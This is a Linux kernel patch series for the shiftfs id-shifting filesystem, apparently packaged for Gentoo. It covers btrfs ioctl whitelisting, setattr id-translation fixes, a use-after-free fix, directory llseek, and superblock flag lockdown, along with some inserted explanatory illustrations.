-+		"shiftfs_file_info_cache", sizeof(struct shiftfs_file_info), 0,
-+		SLAB_HWCACHE_ALIGN | SLAB_ACCOUNT | SLAB_MEM_SPREAD, NULL);
-+	if (!shiftfs_file_info_cache)
-+		return -ENOMEM;
-+
- 	return register_filesystem(&shiftfs_type);
- }
- 
- static void __exit shiftfs_exit(void)
- {
- 	unregister_filesystem(&shiftfs_type);
-+	kmem_cache_destroy(shiftfs_file_info_cache);
- }
- 
- MODULE_ALIAS_FS("shiftfs");
- MODULE_AUTHOR("James Bottomley");
--MODULE_DESCRIPTION("uid/gid shifting bind filesystem");
-+MODULE_AUTHOR("Seth Forshee <seth.forshee@canonical.com>");
-+MODULE_AUTHOR("Christian Brauner <christian.brauner@ubuntu.com>");
-+MODULE_DESCRIPTION("id shifting filesystem");
- MODULE_LICENSE("GPL v2");
- module_init(shiftfs_init)
- module_exit(shiftfs_exit)
--- 
-2.39.2
-
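(For orientation between the patches: nearly every operation added by the
patch above wraps its call into the lower filesystem in the same
credential-switching pattern. The sketch below is an editor's illustration,
not part of any patch; the body of shiftfs_override_creds() is inferred from
its call sites and from the creator_cred field set up in shiftfs_fill_super()
above, and example_lower_read() is a hypothetical caller.)

	/* Switch to the credentials saved when the mark mount was created;
	 * always paired with revert_creds(), as at every call site above. */
	static const struct cred *shiftfs_override_creds(const struct super_block *sb)
	{
		struct shiftfs_super_info *sbinfo = sb->s_fs_info;

		return override_creds(sbinfo->creator_cred);
	}

	/* Hypothetical call site: override, call into the lower layer, revert. */
	static ssize_t example_lower_read(struct super_block *sb, struct file *lowerf,
					  struct iov_iter *iter, loff_t *pos)
	{
		const struct cred *oldcred;
		ssize_t ret;

		oldcred = shiftfs_override_creds(sb);
		ret = vfs_iter_read(lowerf, iter, pos, 0);
		revert_creds(oldcred);

		return ret;
	}

Because this restores the mount creator's credentials rather than raising
privileges, an unprivileged caller can only reach what the creator of the
mark mount could already access.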
-From a2e0843dcd21746dfc23df95ab8c93af942fac6b Mon Sep 17 00:00:00 2001
-From: Christian Brauner <christian@brauner.io>
-Date: Thu, 4 Apr 2019 15:39:13 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: support some btrfs ioctls
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1823186
-
-Shiftfs currently only passes through a few ioctl()s to the underlay. These
-are ioctl()s that are generally considered safe. Doing it for random
-ioctl()s would be a security issue. Permissions for ioctl()s are not
-checked before the filesystem gets involved, so if we were to override
-credentials we could, e.g., do a btrfs tree search in the underlay which we
-normally wouldn't be allowed to do.
-However, the btrfs filesystem allows unprivileged users to perform various
-operations through its ioctl() interface. With shiftfs these ioctl()s are
-currently not working. To avoid regressing users who expect btrfs ioctl()s
-to work in unprivileged containers, we can create a whitelist of ioctl()s
-that we allow to go through to the underlay and for which we also switch
-credentials.
-The main problem is how we switch credentials. Since permission checks for
-ioctl()s are done by the actual file system and not by the vfs, any
-additional capable(<cap>)-based checks done by the filesystem would
-unconditionally pass after we switch credentials. So to make credential
-switching safe we drop *all* capabilities when switching credentials. This
-means that only inode-based permission checks will pass.
-
-Btrfs also allows unprivileged users to delete snapshots when the
-filesystem is mounted with the user_subvol_rm_allowed mount option or if
-the caller is capable(CAP_SYS_ADMIN). The latter should never be the case
-with unprivileged users. To make sure we only allow removal of snapshots in
-the former case we drop all capabilities (see above) when switching
-credentials.
-
-Additionally, btrfs allows the creation of snapshots. To make this work we
-need to be (too) clever. When creating a snapshot, btrfs requires that an
-fd to the directory the snapshot is supposed to be created in be passed
-along. This fd obviously references a shiftfs file and as such a shiftfs
-dentry and inode. This will cause btrfs to yell EXDEV. To circumvent this
-problem we need to silently and temporarily replace the passed-in fd with
-an fd that refers to a file that references a btrfs dentry and inode.
-
-Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
-Acked-by: Tyler Hicks <tyhicks@canonical.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 156 +++++++++++++++++++++++++++++++++++++++++++++++++--
- 1 file changed, 151 insertions(+), 5 deletions(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index ad1ae5bce6c1..678cad30f4a5 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -1,6 +1,8 @@
-+#include <linux/btrfs.h>
- #include <linux/capability.h>
- #include <linux/cred.h>
- #include <linux/mount.h>
-+#include <linux/fdtable.h>
- #include <linux/file.h>
- #include <linux/fs.h>
- #include <linux/namei.h>
-@@ -41,7 +43,21 @@ static void shiftfs_fill_inode(struct inode *inode, unsigned long ino,
- 
- #define SHIFTFS_PASSTHROUGH_NONE 0
- #define SHIFTFS_PASSTHROUGH_STAT 1
--#define SHIFTFS_PASSTHROUGH_ALL (SHIFTFS_PASSTHROUGH_STAT)
-+#define SHIFTFS_PASSTHROUGH_IOCTL 2
-+#define SHIFTFS_PASSTHROUGH_ALL                                                \
-+	(SHIFTFS_PASSTHROUGH_STAT | SHIFTFS_PASSTHROUGH_IOCTL)
-+
-+static inline bool shiftfs_passthrough_ioctls(struct shiftfs_super_info *info)
-+{
-+	if (!(info->passthrough & SHIFTFS_PASSTHROUGH_IOCTL))
-+		return false;
-+
-+	if (info->info_mark &&
-+	    !(info->info_mark->passthrough & SHIFTFS_PASSTHROUGH_IOCTL))
-+		return false;
-+
-+	return true;
-+}
- 
- static inline bool shiftfs_passthrough_statfs(struct shiftfs_super_info *info)
- {
-@@ -1345,18 +1361,120 @@ static inline void shiftfs_revert_ioctl_creds(const struct cred *oldcred,
- 	return shiftfs_revert_object_creds(oldcred, newcred);
- }
- 
-+static inline bool is_btrfs_snap_ioctl(int cmd)
-+{
-+	if ((cmd == BTRFS_IOC_SNAP_CREATE) || (cmd == BTRFS_IOC_SNAP_CREATE_V2))
-+		return true;
-+
-+	return false;
-+}
-+
-+static int shiftfs_btrfs_ioctl_fd_restore(int cmd, struct fd lfd, int fd,
-+					  void __user *arg,
-+					  struct btrfs_ioctl_vol_args *v1,
-+					  struct btrfs_ioctl_vol_args_v2 *v2)
-+{
-+	int ret;
-+
-+	if (!is_btrfs_snap_ioctl(cmd))
-+		return 0;
-+
-+	if (cmd == BTRFS_IOC_SNAP_CREATE)
-+		ret = copy_to_user(arg, v1, sizeof(*v1));
-+	else
-+		ret = copy_to_user(arg, v2, sizeof(*v2));
-+
-+	fdput(lfd);
-+	__close_fd(current->files, fd);
-+	kfree(v1);
-+	kfree(v2);
-+
-+	return ret;
-+}
-+
-+static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
-+					  struct btrfs_ioctl_vol_args **b1,
-+					  struct btrfs_ioctl_vol_args_v2 **b2,
-+					  struct fd *lfd,
-+					  int *newfd)
-+{
-+	int oldfd, ret;
-+	struct fd src;
-+	struct btrfs_ioctl_vol_args *v1 = NULL;
-+	struct btrfs_ioctl_vol_args_v2 *v2 = NULL;
-+
-+	if (!is_btrfs_snap_ioctl(cmd))
-+		return 0;
-+
-+	if (cmd == BTRFS_IOC_SNAP_CREATE) {
-+		v1 = memdup_user(arg, sizeof(*v1));
-+		if (IS_ERR(v1))
-+			return PTR_ERR(v1);
-+		oldfd = v1->fd;
-+		*b1 = v1;
-+	} else {
-+		v2 = memdup_user(arg, sizeof(*v2));
-+		if (IS_ERR(v2))
-+			return PTR_ERR(v2);
-+		oldfd = v2->fd;
-+		*b2 = v2;
-+	}
-+
-+	src = fdget(oldfd);
-+	if (!src.file)
-+		return -EINVAL;
-+
-+	ret = shiftfs_real_fdget(src.file, lfd);
-+	fdput(src);
-+	if (ret)
-+		return ret;
-+
-+	*newfd = get_unused_fd_flags(lfd->file->f_flags);
-+	if (*newfd < 0) {
-+		fdput(*lfd);
-+		return *newfd;
-+	}
-+
-+	fd_install(*newfd, lfd->file);
-+
-+	if (cmd == BTRFS_IOC_SNAP_CREATE) {
-+		v1->fd = *newfd;
-+		ret = copy_to_user(arg, v1, sizeof(*v1));
-+		v1->fd = oldfd;
-+	} else {
-+		v2->fd = *newfd;
-+		ret = copy_to_user(arg, v2, sizeof(*v2));
-+		v2->fd = oldfd;
-+	}
-+
-+	if (ret)
-+		shiftfs_btrfs_ioctl_fd_restore(cmd, *lfd, *newfd, arg, v1, v2);
-+
-+	return ret;
-+}
-+
- static long shiftfs_real_ioctl(struct file *file, unsigned int cmd,
- 			       unsigned long arg)
- {
--	long ret = 0;
- 	struct fd lowerfd;
- 	struct cred *newcred;
- 	const struct cred *oldcred;
-+	int newfd = -EBADF;
-+	long err = 0, ret = 0;
-+	void __user *argp = (void __user *)arg;
-+	struct fd btrfs_lfd = {};
- 	struct super_block *sb = file->f_path.dentry->d_sb;
-+	struct btrfs_ioctl_vol_args *btrfs_v1 = NULL;
-+	struct btrfs_ioctl_vol_args_v2 *btrfs_v2 = NULL;
-+
-+	ret = shiftfs_btrfs_ioctl_fd_replace(cmd, argp, &btrfs_v1, &btrfs_v2,
-+					     &btrfs_lfd, &newfd);
-+	if (ret < 0)
-+		return ret;
- 
- 	ret = shiftfs_real_fdget(file, &lowerfd);
- 	if (ret)
--		return ret;
-+		goto out_restore;
- 
- 	ret = shiftfs_override_ioctl_creds(sb, &oldcred, &newcred);
- 	if (ret)
-@@ -1372,9 +1490,33 @@ static long shiftfs_real_ioctl(struct file *file, unsigned int cmd,
- out_fdput:
- 	fdput(lowerfd);
- 
-+out_restore:
-+	err = shiftfs_btrfs_ioctl_fd_restore(cmd, btrfs_lfd, newfd, argp,
-+					     btrfs_v1, btrfs_v2);
-+	if (!ret)
-+		ret = err;
-+
- 	return ret;
- }
- 
-+static bool in_ioctl_whitelist(int flag)
-+{
-+	switch (flag) {
-+	case BTRFS_IOC_SNAP_CREATE:
-+		return true;
-+	case BTRFS_IOC_SNAP_CREATE_V2:
-+		return true;
-+	case BTRFS_IOC_SUBVOL_CREATE:
-+		return true;
-+	case BTRFS_IOC_SUBVOL_CREATE_V2:
-+		return true;
-+	case BTRFS_IOC_SNAP_DESTROY:
-+		return true;
-+	}
-+
-+	return false;
-+}
-+
- static long shiftfs_ioctl(struct file *file, unsigned int cmd,
- 			  unsigned long arg)
- {
-@@ -1386,7 +1528,9 @@ static long shiftfs_ioctl(struct file *file, unsigned int cmd,
- 	case FS_IOC_SETFLAGS:
- 		break;
- 	default:
--		return -ENOTTY;
-+		if (!in_ioctl_whitelist(cmd) ||
-+		    !shiftfs_passthrough_ioctls(file->f_path.dentry->d_sb->s_fs_info))
-+			return -ENOTTY;
- 	}
- 
- 	return shiftfs_real_ioctl(file, cmd, arg);
-@@ -1403,7 +1547,9 @@ static long shiftfs_compat_ioctl(struct file *file, unsigned int cmd,
- 	case FS_IOC32_SETFLAGS:
- 		break;
- 	default:
--		return -ENOIOCTLCMD;
-+		if (!in_ioctl_whitelist(cmd) ||
-+		    !shiftfs_passthrough_ioctls(file->f_path.dentry->d_sb->s_fs_info))
-+			return -ENOIOCTLCMD;
- 	}
- 
- 	return shiftfs_real_ioctl(file, cmd, arg);
--- 
-2.39.2
-
-From 7e64c9484f2524943cde1164852c1888312c010f Mon Sep 17 00:00:00 2001
-From: Seth Forshee <seth.forshee@canonical.com>
-Date: Thu, 11 Apr 2019 07:31:04 -0500
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: use translated ids when changing lower
- fs attrs
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1824350
-
-shiftfs_setattr() is preparing a new set of attributes with the
-owner translated for the lower fs, but it then passes the
-original attrs. As a result the owner is set to the untranslated
-owner, which causes the shiftfs inodes to also have incorrect
-ids. For example:
-
- # mkdir dir
- # touch file
- # ls -lh dir file
- drwxr-xr-x 2 root root 4.0K Apr 11 13:05 dir
- -rw-r--r-- 1 root root 0 Apr 11 13:05 file
- # chown 500:500 dir file
- # ls -lh dir file
- drwxr-xr-x 2 1000500 1000500 4.0K Apr 11 12:42 dir
- -rw-r--r-- 1 1000500 1000500 0 Apr 11 12:42 file
-
-Fix this to pass the correct iattr struct to notify_change().
-
-Reviewed-by: Christian Brauner <christian.brauner@ubuntu.com>
-Acked-by: Thadeu Lima de Souza Cascardo <cascardo@canonical.com>
-Acked-by: Tyler Hicks <tyhicks@canonical.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 678cad30f4a5..e736fd6afcb4 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -779,7 +779,7 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
- 
- 	inode_lock(loweri);
- 	oldcred = shiftfs_override_creds(dentry->d_sb);
--	err = notify_change(lowerd, attr, NULL);
-+	err = notify_change(lowerd, &newattr, NULL);
- 	revert_creds(oldcred);
- 	inode_unlock(loweri);
- 
--- 
-2.39.2
-
-From 84e09374dce45b2aaec7e719acd209b1e5e4ae85 Mon Sep 17 00:00:00 2001
-From: Seth Forshee <seth.forshee@canonical.com>
-Date: Sat, 13 Apr 2019 14:41:01 -0500
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: fix passing of attrs to underlay for
- setattr
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1824717
-
-shiftfs_setattr() makes a copy of the attrs it was passed to pass
-to the lower fs. It then calls setattr_prepare() with the original
-attrs, and this may make changes which are not reflected in the
-attrs passed to the lower fs. To fix this, copy the attrs to the
-new struct for the lower fs after calling setattr_prepare().
-
-Additionally, notify_change() may have set ATTR_MODE when one of
-ATTR_KILL_S[UG]ID is set, and passing this combination to
-notify_change() will trigger a BUG(). Do as overlayfs and
-ecryptfs both do, and clear ATTR_MODE if either of those bits
-is set.
-
-Reviewed-by: Christian Brauner <christian.brauner@ubuntu.com>
-Acked-by: Marcelo Henrique Cerri <marcelo.cerri@canonical.com>
-Acked-by: Brad Figg <brad.figg@canonical.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 10 +++++++++-
- 1 file changed, 9 insertions(+), 1 deletion(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index e736fd6afcb4..8e064756ea0c 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -765,7 +765,7 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
- {
- 	struct dentry *lowerd = dentry->d_fsdata;
- 	struct inode *loweri = lowerd->d_inode;
--	struct iattr newattr = *attr;
-+	struct iattr newattr;
- 	const struct cred *oldcred;
- 	struct super_block *sb = dentry->d_sb;
- 	int err;
-@@ -774,9 +774,17 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
- 	if (err)
- 		return err;
- 
-+	newattr = *attr;
- 	newattr.ia_uid = KUIDT_INIT(from_kuid(sb->s_user_ns, attr->ia_uid));
- 	newattr.ia_gid = KGIDT_INIT(from_kgid(sb->s_user_ns, attr->ia_gid));
- 
-+	/*
-+	 * mode change is for clearing setuid/setgid bits. Allow lower fs
-+	 * to interpret this in its own way.
-+	 */
-+	if (newattr.ia_valid & (ATTR_KILL_SUID|ATTR_KILL_SGID))
-+		newattr.ia_valid &= ~ATTR_MODE;
-+
- 	inode_lock(loweri);
- 	oldcred = shiftfs_override_creds(dentry->d_sb);
- 	err = notify_change(lowerd, &newattr, NULL);
--- 
-2.39.2
-
-From a3ba10b3019139566fa65c351966ca3482c90819 Mon Sep 17 00:00:00 2001
-From: Christian Brauner <christian@brauner.io>
-Date: Mon, 15 Apr 2019 15:21:55 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: prevent use-after-free when verifying
- mount options
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1824735
-
-Copy up the passthrough mount settings of the mark mount point to the
-shiftfs overlay.
-
-Before this commit we used to keep a reference to the shiftfs mark
-mount's shiftfs_super_info which was stashed in the superblock of the
-mark mount. The problem is that we only take a reference to the mount of
-the underlay, i.e. the filesystem that is *under* the shiftfs mark
-mount. This means when someone performs a shiftfs mark mount, then a
-shiftfs overlay mount and then immediately unmounts the shiftfs mark
-mount, we muck with invalid memory since shiftfs_put_super might have
-already been called, freeing that memory.
-
-Another solution would be to start reference counting. But this would be
-overkill. We only care about the passthrough mount option of the mark
-mount. And we only need it to verify that on remount the new passthrough
-options of the shiftfs overlay are a subset of the mark mount's
-passthrough options. In other scenarios we don't care. So copying up is
-good enough and also only needs to happen once on mount, i.e. when a new
-superblock is created and the .fill_super method is called.
-
-Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
-Acked-by: Seth Forshee <seth.forshee@canonical.com>
-Acked-by: Stefan Bader <stefan.bader@canonical.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 29 ++++++++++++++++++-----------
- 1 file changed, 18 insertions(+), 11 deletions(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 8e064756ea0c..4c8a6ec2a617 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -28,7 +28,7 @@ struct shiftfs_super_info {
- 	const struct cred *creator_cred;
- 	bool mark;
- 	unsigned int passthrough;
--	struct shiftfs_super_info *info_mark;
-+	unsigned int passthrough_mark;
- };
- 
- struct shiftfs_file_info {
-@@ -52,10 +52,6 @@ static inline bool shiftfs_passthrough_ioctls(struct shiftfs_super_info *info)
- 	if (!(info->passthrough & SHIFTFS_PASSTHROUGH_IOCTL))
- 		return false;
- 
--	if (info->info_mark &&
--	    !(info->info_mark->passthrough & SHIFTFS_PASSTHROUGH_IOCTL))
--		return false;
--
- 	return true;
- }
- 
-@@ -64,10 +60,6 @@ static inline bool shiftfs_passthrough_statfs(struct shiftfs_super_info *info)
- 	if (!(info->passthrough & SHIFTFS_PASSTHROUGH_STAT))
- 		return false;
- 
--	if (info->info_mark &&
--	    !(info->info_mark->passthrough & SHIFTFS_PASSTHROUGH_STAT))
--		return false;
--
- 	return true;
- }
- 
-@@ -1824,7 +1816,7 @@ static int shiftfs_remount(struct super_block *sb, int *flags, char *data)
- 
- 	if (info->passthrough != new.passthrough) {
- 		/* Don't allow exceeding passthrough options of mark mount. */
--		if (!passthrough_is_subset(info->info_mark->passthrough,
-+		if (!passthrough_is_subset(info->passthrough_mark,
- 					   info->passthrough))
- 			return -EPERM;
- 
-@@ -1926,9 +1918,19 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
- 
- 			sbinfo->mnt = mntget(sbinfo_mp->mnt);
- 			dentry = dget(path.dentry->d_fsdata);
-+			/*
-+			 * Copy up the passthrough mount options from the
-+			 * parent mark mountpoint.
-+			 */
-+			sbinfo->passthrough_mark = sbinfo_mp->passthrough_mark;
- 		} else {
- 			sbinfo->mnt = mntget(path.mnt);
- 			dentry = dget(path.dentry);
-+			/*
-+			 * For a new mark passthrough_mark and passthrough
-+			 * are identical.
-+			 */
-+			sbinfo->passthrough_mark = sbinfo->passthrough;
- 		}
- 
- 		sbinfo->creator_cred = prepare_creds();
-@@ -1956,7 +1958,12 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
- 		sbinfo->mnt = mntget(sbinfo_mp->mnt);
- 		sbinfo->creator_cred = get_cred(sbinfo_mp->creator_cred);
- 		dentry = dget(path.dentry->d_fsdata);
--		sbinfo->info_mark = sbinfo_mp;
-+		/*
-+		 * Copy up passthrough settings from mark mountpoint so we can
-+		 * verify when the overlay wants to remount with different
-+		 * passthrough settings.
-+		 */
-+		sbinfo->passthrough_mark = sbinfo_mp->passthrough;
- 	}
- 
- 	sb->s_stack_depth = dentry->d_sb->s_stack_depth + 1;
--- 
-2.39.2
-
-From a6ec1bf679d71f552f3eee7bf2b5458a6ea71e9a Mon Sep 17 00:00:00 2001
-From: Christian Brauner <christian@brauner.io>
-Date: Tue, 16 Apr 2019 18:29:00 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: use separate llseek method for
- directories
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1824812
-
-Give shiftfs its own proper llseek method for directories.
-
-Before this commit we relied on an llseek method targeted at regular
-files for both directories and regular files.
-However, the realfile's f_pos was not correctly handled when userspace
-called lseek(2) on a shiftfs directory file. Give directories their
-own llseek operation so that seeking on a directory file is properly
-supported.
-
-Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
-Acked-by: Seth Forshee <seth.forshee@canonical.com>
-Acked-by: Tyler Hicks <tyhicks@canonical.com>
-Acked-by: Stefan Bader <stefan.bader@canonical.com>
-Signed-off-by: Kleber Sacilotto de Souza <kleber.souza@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 14 +++++++++++---
- 1 file changed, 11 insertions(+), 3 deletions(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 4c8a6ec2a617..9771165d1ce0 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -1144,7 +1144,15 @@ static int shiftfs_release(struct inode *inode, struct file *file)
- 	return 0;
- }
- 
--static loff_t shiftfs_llseek(struct file *file, loff_t offset, int whence)
-+static loff_t shiftfs_dir_llseek(struct file *file, loff_t offset, int whence)
-+{
-+	struct shiftfs_file_info *file_info = file->private_data;
-+	struct file *realfile = file_info->realfile;
-+
-+	return vfs_llseek(realfile, offset, whence);
-+}
-+
-+static loff_t shiftfs_file_llseek(struct file *file, loff_t offset, int whence)
- {
- 	struct inode *realinode = file_inode(file)->i_private;
- 
-@@ -1653,7 +1661,7 @@ static int shiftfs_iterate_shared(struct file *file, struct dir_context *ctx)
- const struct file_operations shiftfs_file_operations = {
- 	.open			= shiftfs_open,
- 	.release		= shiftfs_release,
--	.llseek			= shiftfs_llseek,
-+	.llseek			= shiftfs_file_llseek,
- 	.read_iter		= shiftfs_read_iter,
- 	.write_iter		= shiftfs_write_iter,
- 	.fsync			= shiftfs_fsync,
-@@ -1670,7 +1678,7 @@ const struct file_operations shiftfs_dir_operations = {
- 	.compat_ioctl		= shiftfs_compat_ioctl,
- 	.fsync			= shiftfs_fsync,
- 	.iterate_shared		= shiftfs_iterate_shared,
--	.llseek			= shiftfs_llseek,
-+	.llseek			= shiftfs_dir_llseek,
- 	.open			= shiftfs_open,
- 	.read			= generic_read_dir,
- 	.release		= shiftfs_release,
--- 
-2.39.2
-
-From 10c6312a5c1cd2fbbbcb47adf7597e8cb2e18391 Mon Sep 17 00:00:00 2001
-From: Christian Brauner <christian@brauner.io>
-Date: Wed, 8 May 2019 14:13:14 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: lock down certain superblock flags
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1827122
-
-This locks down various superblock flags to prevent userns-root from
-remounting a superblock with less restrictive options than the original
-mark or underlay mount.
-
-Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 47 ++++++++++++++++++++++++++++++++++++++++++++++-
- 1 file changed, 46 insertions(+), 1 deletion(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 9771165d1ce0..a1dae7ea593b 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -1808,6 +1808,33 @@ static inline bool passthrough_is_subset(int old_flags, int new_flags)
- 	return true;
- }
- 
-+static int shiftfs_super_check_flags(unsigned long old_flags,
-+				     unsigned long new_flags)
-+{
-+	if ((old_flags & SB_RDONLY) && !(new_flags & SB_RDONLY))
-+		return -EPERM;
-+
-+	if ((old_flags & SB_NOSUID) && !(new_flags & SB_NOSUID))
-+		return -EPERM;
-+
-+	if ((old_flags & SB_NODEV) && !(new_flags & SB_NODEV))
-+		return -EPERM;
-+
-+	if ((old_flags & SB_NOEXEC) && !(new_flags & SB_NOEXEC))
-+		return -EPERM;
-+
-+	if ((old_flags & SB_NOATIME) && !(new_flags & SB_NOATIME))
-+		return -EPERM;
-+
-+	if ((old_flags & SB_NODIRATIME) && !(new_flags & SB_NODIRATIME))
-+		return -EPERM;
-+
-+	if (!(old_flags & SB_POSIXACL) && (new_flags & SB_POSIXACL))
-+		return -EPERM;
-+
-+	return 0;
-+}
-+
- static int shiftfs_remount(struct super_block *sb, int *flags, char *data)
- {
- 	int err;
-@@ -1818,6 +1845,10 @@ static int shiftfs_remount(struct super_block *sb, int *flags, char *data)
- 	if (err)
- 		return err;
- 
-+	err = shiftfs_super_check_flags(sb->s_flags, *flags);
-+	if (err)
-+		return err;
-+
- 	/* Mark mount option cannot be changed. */
- 	if (info->mark || (info->mark != new.mark))
- 		return -EPERM;
-@@ -1847,6 +1878,16 @@ struct shiftfs_data {
- 	const char *path;
- };
- 
-+static void shiftfs_super_force_flags(struct super_block *sb,
-+				      unsigned long lower_flags)
-+{
-+	sb->s_flags |= lower_flags & (SB_RDONLY | SB_NOSUID | SB_NODEV |
-+				      SB_NOEXEC | SB_NOATIME | SB_NODIRATIME);
-+
-+	if (!(lower_flags & SB_POSIXACL))
-+		sb->s_flags &= ~SB_POSIXACL;
-+}
-+
- static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
- 			      int silent)
- {
-@@ -1888,6 +1929,8 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
- 		goto out_put_path;
- 	}
- 
-+	sb->s_flags |= SB_POSIXACL;
-+
- 	if (sbinfo->mark) {
- 		struct super_block *lower_sb = path.mnt->mnt_sb;
- 
-@@ -1904,6 +1947,8 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
- 		 */
- 		sb->s_iflags = SB_I_NOEXEC;
- 
-+		shiftfs_super_force_flags(sb, lower_sb->s_flags);
-+
- 		/*
- 		 * Handle nesting of shiftfs mounts by referring this mark
- 		 * mount back to the original mark mount. This is more
-@@ -1972,6 +2017,7 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
- 		 * passthrough settings.
- 		 */
- 		sbinfo->passthrough_mark = sbinfo_mp->passthrough;
-+		shiftfs_super_force_flags(sb, path.mnt->mnt_sb->s_flags);
- 	}
- 
- 	sb->s_stack_depth = dentry->d_sb->s_stack_depth + 1;
-@@ -1995,7 +2041,6 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
- 	sb->s_op = &shiftfs_super_ops;
- 	sb->s_xattr = shiftfs_xattr_handlers;
- 	sb->s_d_op = &shiftfs_dentry_ops;
--	sb->s_flags |= SB_POSIXACL;
- 	sb->s_root = d_make_root(inode);
- 	if (!sb->s_root) {
- 		err = -ENOMEM;
--- 
-2.39.2
-
-From 650ec55632c03c03e6cc5b08a764609b4b0eb192 Mon Sep 17 00:00:00 2001
-From: Christian Brauner <christian@brauner.io>
-Date: Tue, 11 Jun 2019 11:47:35 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: allow changing ro/rw for subvolumes
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1832316
-
-This enables toggling between ro/rw for btrfs subvolumes under shiftfs.
-
-Currently, btrfs workloads employing shiftfs cause a regression.
-With btrfs unprivileged users can already toggle whether a subvolume
-will be ro or rw. This is broken on current shiftfs as we haven't
-whitelisted these ioctls.
-To prevent this regression, we need to whitelist the ioctls
-BTRFS_IOC_FS_INFO, BTRFS_IOC_SUBVOL_GETFLAGS, and
-BTRFS_IOC_SUBVOL_SETFLAGS. All of them should be safe for unprivileged
-users.
-
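-For illustration, the unprivileged toggle this re-enables looks roughly
-like the following (hypothetical path, error handling omitted; note the
-whitelist only admits BTRFS_IOC_SUBVOL_SETFLAGS when no bit besides
-BTRFS_SUBVOL_RDONLY is set):
-
- #include <linux/btrfs.h>
- #include <sys/ioctl.h>
- #include <fcntl.h>
-
- int fd = open("/mnt/shiftfs/subvol", O_RDONLY);
- __u64 flags;
-
- ioctl(fd, BTRFS_IOC_SUBVOL_GETFLAGS, &flags); /* read current flags */
- flags |= BTRFS_SUBVOL_RDONLY;                 /* mark read-only */
- ioctl(fd, BTRFS_IOC_SUBVOL_SETFLAGS, &flags); /* write them back */
-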
-Cc: Seth Forshee <seth.forshee@canonical.com>
-Cc: Tyler Hicks <tyhicks@canonical.com>
-Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 21 ++++++++++++++++++---
- 1 file changed, 18 insertions(+), 3 deletions(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index a1dae7ea593b..49f6714e9f95 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -1507,9 +1507,14 @@ static long shiftfs_real_ioctl(struct file *file, unsigned int cmd,
- 	return ret;
- }
- 
--static bool in_ioctl_whitelist(int flag)
-+static bool in_ioctl_whitelist(int flag, unsigned long arg)
- {
-+	void __user *argp = (void __user *)arg;
-+	u64 flags = 0;
-+
- 	switch (flag) {
-+	case BTRFS_IOC_FS_INFO:
-+		return true;
- 	case BTRFS_IOC_SNAP_CREATE:
- 		return true;
- 	case BTRFS_IOC_SNAP_CREATE_V2:
-@@ -1517,6 +1522,16 @@ static bool in_ioctl_whitelist(int flag)
